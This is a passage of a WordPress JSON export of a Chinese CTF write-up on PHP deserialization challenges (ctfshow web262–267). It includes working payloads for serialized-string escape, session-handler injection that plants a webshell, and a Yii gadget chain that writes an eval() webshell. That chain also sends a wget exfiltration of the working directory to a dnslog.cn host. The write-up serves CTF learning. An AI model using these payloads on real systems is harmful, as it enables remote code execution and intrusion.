&nbsp;if($msg-&gt;token=='admin'){<br> &nbsp; &nbsp; &nbsp; &nbsp;echo $flag;<br> &nbsp;  }<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>if\u5224\u65ad\u91cc\u9700\u8981token==admin\uff0c\u800cclass\u7c7b\u91cctoken\u4e3auser\uff0c\u6240\u4ee5\u9700\u8981\u9003\u9038\u540e\u4fee\u6539<\/p><\/blockquote>\n\n\n\n<p>\u5173\u4e8e\u5b57\u7b26\u9003\u9038\u5728\u77e5\u8bc6\u70b9\u91cc\u6709\u8bb2\u600e\u4e48\u9003\u9038\uff0c\u8fd9\u91cc\u76f4\u63a5\u4e0apayload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class message{<br> &nbsp; &nbsp;public $from;<br> &nbsp; &nbsp;public $msg;<br> &nbsp; &nbsp;public $to;<br> &nbsp; &nbsp;public $token='user';<br> &nbsp; &nbsp;public function __construct($f,$m,$t){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;from = $f;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;msg = $m;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;to = $t;<br> &nbsp;  }<br>}<br>function filter($msg){<br>    return str_replace('fuck', 'loveU', $msg);<br>}<br>\u200b<br>$msg = new message('fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck\";s:3:\"msg\";s:1:\"b\";s:2:\"to\";s:1:\"c\";s:5:\"token\";s:5:\"admin\";}','b','c');<br>\u200b<br>$msg_1 = base64_encode(filter(serialize($msg)));<br>\u200b<br>echo $msg_1;<br>\/\/\";s:3:\"msg\";s:1:\"b\";s:2:\"to\";s:1:\"c\";s:5:\"token\";s:5:\"admin\";} \u6539\u6210admin\u540e\u8fd9\u91cc\u670962\u4e2a\u5b57\u7b26\uff0c\u56e0\u6b64\u9700\u8981\u8f93\u516562\u4e2afuck\u8fdb\u884c\u9003\u9038<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web263\u2014session<\/h2>\n\n\n\n<p>\u6e90\u7801\u6cc4\u9732\uff0c<code>\/www.zip<\/code>\u4e0b\u8f7d<\/p>\n\n\n\n<p><strong>index.php<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011328.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011328.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210714011319973\"\/><\/div><\/figure>\n\n\n\n<p>\u5199\u5165cookie\uff0c\u540d\u4e3alimit<\/p>\n\n\n\n<p><strong>check.php<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011601.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011601.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210714011601613\"\/><\/div><\/figure>\n\n\n\n<p>\u8c03\u7528cookie<\/p>\n\n\n\n<p><strong>inc.php<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011652.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714011652.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210714011652380\"\/><\/div><\/figure>\n\n\n\n<p>\u7c7bUser\u4e2d\uff0c\u6709<code>file_put_contents<\/code>\u51fd\u6570\uff0c\u53ef\u4ee5username\u4f5c\u4e3a\u6587\u4ef6\u540d\uff0cpassword\u4e3a\u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n\n\n\n<p>\u5e76\u4e14\u5728inc.php\u4e2d\uff0c\u6709<code>ini_set('session.serialize_handler', 'php');<\/code>\uff0c\u8bf4\u660e\u8bfb\u53d6session\u5f15\u64ce\u4e3a\u9ed8\u8ba4php\u5f15\u64ce\uff0c\u53ef\u4ee5\u5229\u7528\u52a0<code>|<\/code>\u8fdb\u884c\u4f2a\u9020\u5e8f\u5217\u5316<\/p>\n\n\n\n<p>\u601d\u8def\u4e3a\uff0c\u6784\u9020\u4e00\u4e2a\u5e8f\u5217\u5316\u7684payload\uff0c\u4f2a\u9020\u4e3alimit\u7684cookie\uff0c\u8bbf\u95eeindex.php\u5199\u5165\uff0c\u518d\u8bbf\u95eecheck.php\u8fdb\u884c\u8c03\u7528\uff0c\u7136\u540e\u8bbf\u95eelog-\u5199\u5165\u7684\u6587\u4ef6\u540d\u5373\u53ef\u8c03\u7528\u5199\u5165\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n\n\n\n<p>payload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class User{<br> &nbsp; &nbsp;public $username;<br> &nbsp; &nbsp;public $password;<br> &nbsp; &nbsp;public $status;<br> &nbsp; &nbsp;function __construct($username,$password){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username = $username;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password = $password;<br> &nbsp;  }<br> &nbsp; &nbsp;function setStatus($s){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;status=$s;<br> &nbsp;  }<br>}<br>\u200b<br>$User = new User('1.php','&lt;?php system(\"tac flag*\");?&gt;');<br>\u200b<br>echo base64_encode('|'.serialize($User));<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web264<\/h2>\n\n\n\n<p>\u5927\u81f4\u6e90\u7801\u8ddfweb262\u76f8\u540c\uff0c\u6709\u533a\u522b\u7684\u662f\u5728message.php\u4e2d\u7684\u8fd9\u6bb5\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>if(isset($_COOKIE&#91;'msg'])){<br> &nbsp; &nbsp;$msg = unserialize(base64_decode($_SESSION&#91;'msg']));<br> &nbsp; &nbsp;if($msg-&gt;token=='admin'){<br> &nbsp; &nbsp; &nbsp; &nbsp;echo $flag;<br> &nbsp;  }<br>}<\/code><\/pre>\n\n\n\n<p>\u7528\u7684\u662fsession\uff0c\u4e14\u9700\u8981\u5b58\u5728\u540d\u4e3amsg\u7684cookie<\/p>\n\n\n\n<p>\u6784\u9020payload\u7684\u65b9\u6cd5\u548c262\u76f8\u540c\uff0c\u7136\u540eurl\u4f20\u53c2<\/p>\n\n\n\n<p><code>f=a&amp;m=b&amp;t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck\";s:5:\"token\";s:5:\"admin\";}<\/code>\uff0c<\/p>\n\n\n\n<p>\u6700\u540e\u5728cookie\u4e0a\u6dfb\u52a0msg\uff0c\u503c\u968f\u4fbf\u4f20\uff0c\u518d\u8bbf\u95eemessage.php<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web265\u2014\u6309\u5730\u5740\u4f20\u53c2<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>include('flag.php');<br>highlight_file(__FILE__);<br>class ctfshowAdmin{<br> &nbsp; &nbsp;public $token;<br> &nbsp; &nbsp;public $password;<br>\u200b<br> &nbsp; &nbsp;public function __construct($t,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;token=$t;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password = $p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;token===$this-&gt;password;<br> &nbsp;  }<br>}<br>\u200b<br>$ctfshow = unserialize($_GET&#91;'ctfshow']);<br>$ctfshow-&gt;token=md5(mt_rand());<br>\u200b<br>if($ctfshow-&gt;login()){<br> &nbsp; &nbsp;echo $flag;<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u767b\u5f55\u9700\u8981token\u503c\u4e0epassword\u503c\u5168\u7b49\uff0c\u800ctoken\u503c\u662f\u4e00\u4e2a\u968f\u673a\u6570\u7684md5\uff0c\u662f\u4e0d\u53ef\u786e\u5b9a\u7684\u3002\u56e0\u6b64\u9700\u8981\u5c06password\u503c\u7684\u5730\u5740\u4f20\u5230token\u4e0a\u624d\u80fd\u4fdd\u8bc1\u503c\u76f8\u7b49<\/p><\/blockquote>\n\n\n\n<p>\u8003\u5bdf\u7684\u662fphp\u6309\u5730\u5740\u4f20\u53c2<code>&amp;<\/code>\uff0c\u9700\u8981\u5f15\u7528\u4e00\u4e2a\u4e2d\u95f4\u53d8\u91cf<\/p>\n\n\n\n<p>payload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfshowAdmin{<br> &nbsp; &nbsp;public $token;<br> &nbsp; &nbsp;public $password;<br>\u200b<br> &nbsp; &nbsp;public function __construct($t,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;token=$t;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password = &amp;$this-&gt;token;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;token===$this-&gt;password;<br> &nbsp;  }<br>}<br>$admin = new ctfshowAdmin('123','123');<br>echo serialize($admin);<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web266\u2014\u5927\u5c0f\u5199<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>highlight_file(__FILE__);<br>\u200b<br>include('flag.php');<br>$cs = file_get_contents('php:\/\/input');<br>\u200b<br>\u200b<br>class ctfshow{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public function __construct($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username=$u;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password=$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$this-&gt;password;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __toString(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp;echo $flag;<br> &nbsp;  }<br>}<br>$ctfshowo=@unserialize($cs);<br>if(preg_match('\/ctfshow\/', $cs)){<br> &nbsp; &nbsp;throw new Exception(\"Error $ctfshowo\",1);<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u53ef\u4ee5\u770b\u5230__destruct\u65b9\u6cd5\u53ef\u4ee5\u8f93\u51faflag\uff0c\u4f46\u5728\u6b63\u5219\u5339\u914d\u4e2d\u542b\u6709ctfshow\u5c31\u629b\u51fa\u5f02\u5e38\uff0c\u5e8f\u5217\u5316\u540e\u542b\u6709ctfshow\uff0c\u56e0\u6b64\u9700\u8981\u7ed5\u8fc7<\/p><p>\u5176\u4e2d\u63a5\u6536\u5e8f\u5217\u5316\u6570\u636e\u7684\u662f$cs,\u800c$cs\u662f\u7528php:\/\/input<\/p><\/blockquote>\n\n\n\n<p><strong>PHP\u5927\u5c0f\u5199\uff1a\u51fd\u6570\u540d\u548c\u7c7b\u540d\u4e0d\u533a\u5206,\u53d8\u91cf\u540d\u533a\u5206<\/strong><\/p>\n\n\n\n<p><strong>php:\/\/input\u662f\u4e00\u4e2a\u53ea\u8bfb\u4fe1\u606f\u6d41\uff0c\u5f53\u8bf7\u6c42\u65b9\u5f0f\u662fpost\u3002\u4e00\u822c\u670d\u52a1\u7aef\u4f7f\u7528file_get_contents\u83b7\u53d6php:\/\/input\u5185\u5bb9<code>file_get_contents(php:\/\/input)<\/code><\/strong><\/p>\n\n\n\n<p>\u56e0\u6b64\u5728\u5e8f\u5217\u5316\u540e\u6539\u5176\u4e2dctfshow\u7684\u5b57\u6bcd\u4e3a\u5927\u5199\uff0c\u7528bp\u6293\u5305post\u4e0a\u53bb\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfshow{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br>}<br>$ctf = new ctfshow();<br>echo serialize($ctf);<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web267\u2014yii\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<\/h2>\n\n\n\n<p>\u5f31\u5bc6\u7801 admin admin\u767b\u5f55\u6210\u529f\u540e\uff0c\u5728about\u9875\u9762\u53d1\u73b0\u63d0\u793a?view-source \u8bbf\u95ee<code>url\/?r=site\/about&amp;view-source<\/code>\u5f97\u5230\u53cd\u5e8f\u5217\u5316\u70b9<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/\/\/backdoor\/shell<br>unserialize(base64_decode($_GET['code']))<\/pre>\n\n\n\n<p>payload <code>?r=backdoor\/shell&amp;code=poc<\/code><\/p>\n\n\n\n<p>\u5728poc\u4e2d\u5f97\u77e5\u5f53\u524d\u8def\u5f84\u6240\u5728\u7684\u6b65\u9aa4<\/p>\n\n\n\n<p>\u7528dnslog\uff1a<a href=\"http:\/\/dnslog.cn\/\">DNSLog Platform<\/a>\u751f\u6210SubDomain<\/p>\n\n\n\n<p>\u6784\u9020\u53c2\u6570\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$this-&gt;id = \"wget `pwd|base64`.tmrolu.dnslog.cn\";<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714174208.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210714174208.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20210714174201304\"\/><\/div><\/figure>\n\n\n\n<p>\u7136\u540ebase64\u89e3\u5bc6\u5f97\u5230\u5f53\u524d\u8def\u5f84<\/p>\n\n\n\n<p>poc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>namespace yii\\rest{<br> &nbsp; &nbsp;class CreateAction{<br> &nbsp; &nbsp; &nbsp; &nbsp;public $checkAccess;<br> &nbsp; &nbsp; &nbsp; &nbsp;public $id;<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;checkAccess = 'shell_exec';<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;id = \"echo '&lt;?php eval(\\$_POST&#91;1]);phpinfo();?&gt;' &gt; \/var\/www\/html\/basic\/web\/1.php\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>namespace Faker{<br> &nbsp; &nbsp;use yii\\rest\\CreateAction;<br>\u200b<br> &nbsp; &nbsp;class Generator{<br> &nbsp; &nbsp; &nbsp; &nbsp;protected $formatters;<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;formatters&#91;'close'] = &#91;new CreateAction(), 'run'];<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>namespace yii\\db{<br> &nbsp; &nbsp;use Faker\\Generator;<br>\u200b<br> &nbsp; &nbsp;class BatchQueryResult{<br> &nbsp; &nbsp; &nbsp; &nbsp;private $_dataReader;<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;_dataReader = new Generator;<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>namespace{<br> &nbsp; &nbsp;echo base64_encode(serialize(new yii\\db\\BatchQueryResult));<br>}<br>?&gt;<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u77e5\u8bc6\u70b9\uff1aphp\u53cd\u5e8f\u5217\u5316 \u2013 \u9752\u5d50 web254 \u4ee3\u7801\u5ba1\u8ba1\uff0c\u9996\u5148\u521d\u59cb\u5316ctfShowUser\u7c7b\uff0c\u5728\u7b2c\u4e8c\u5c42if\u5f53\u4e2d [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[18],"_links":{"self":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/227"}],"collection":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=227"}],"version-history":[{"count":2,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/227\/revisions"}],"predecessor-version":[{"id":232,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/227\/revisions\/232"}],"wp:attachment":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=227"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=227"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=227"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}